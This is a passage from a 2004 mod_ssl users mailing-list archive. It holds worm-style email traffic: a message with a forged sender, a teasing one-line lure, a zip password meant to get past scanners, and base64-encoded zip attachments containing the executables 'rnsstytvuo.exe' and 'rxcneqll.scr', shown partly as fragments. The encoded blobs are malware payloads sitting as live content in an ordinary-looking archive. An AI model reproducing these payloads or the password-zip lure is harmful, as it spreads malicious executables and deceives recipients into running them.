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
AAEAAQA6AAAALVUAAAAA

----------cqpbvwhgjukdcknyaoqx--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 19:05:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7DC27A8A81; Tue,  2 Mar 2004 19:05:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from EB-E2-013 (bing168.watson128.binghamton.edu [128.226.128.168])
	by master.modssl.org (Postfix) with SMTP id 9EC0CA8973
	for ; Tue,  2 Mar 2004 19:04:58 +0100 (CET)
Date: Tue, 02 Mar 2004 13:04:56 -0500
To: modssl-users@modssl.org
Subject: ello! =))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------kmhqnjfeknnhykigfxdv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------kmhqnjfeknnhykigfxdv
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking forward for a  response :P

archive password:  56758

----------kmhqnjfeknnhykigfxdv
Content-Type: application/octet-stream; name="Msg.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Msg.zip"

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
